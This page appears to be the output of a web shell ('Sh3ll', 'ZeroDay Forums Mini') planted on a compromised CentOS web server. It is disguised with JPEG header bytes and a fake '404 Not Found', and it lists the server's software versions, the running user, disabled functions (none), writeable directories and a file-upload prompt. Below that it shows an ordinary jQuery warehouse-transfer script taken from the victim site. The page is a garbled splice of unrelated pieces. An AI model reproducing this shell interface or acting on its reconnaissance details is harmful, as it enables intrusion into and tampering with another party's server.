����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/adimi/application/modules/dashboard/assets/js/wearhouse_transfer.js
"use strict";
//Select transfer to
$('body').on('change',"#transfer_to,#wearhouse_id",function(event){
    event.preventDefault(); 
    var transfer_id=$('#transfer_to').val();
    var wearhouse_id=$('#wearhouse_id').val();
    var csrf_test_name=  $("#CSRF_TOKEN").val();

    if ( !wearhouse_id ) {
        alert(display('please_select_wearhouse'));
        return false;
    }
    $.ajax({
        url: base_url+'dashboard/Cwearhouse/wearhouse_transfer_select',
        type: 'post',
        data: {transfer_id:transfer_id,wearhouse_id:wearhouse_id,csrf_test_name:csrf_test_name},
        success: function (msg){
            if (msg) {
                $("#transfer").css('display','block');
                $("#transfer").html(msg);
            }else{
                $("#transfer").html('');
            }
        },
        error: function (xhr, desc, err){
             alert('failed');
        }
    });        
});
//Product select by ajax end

ZeroDay Forums Mini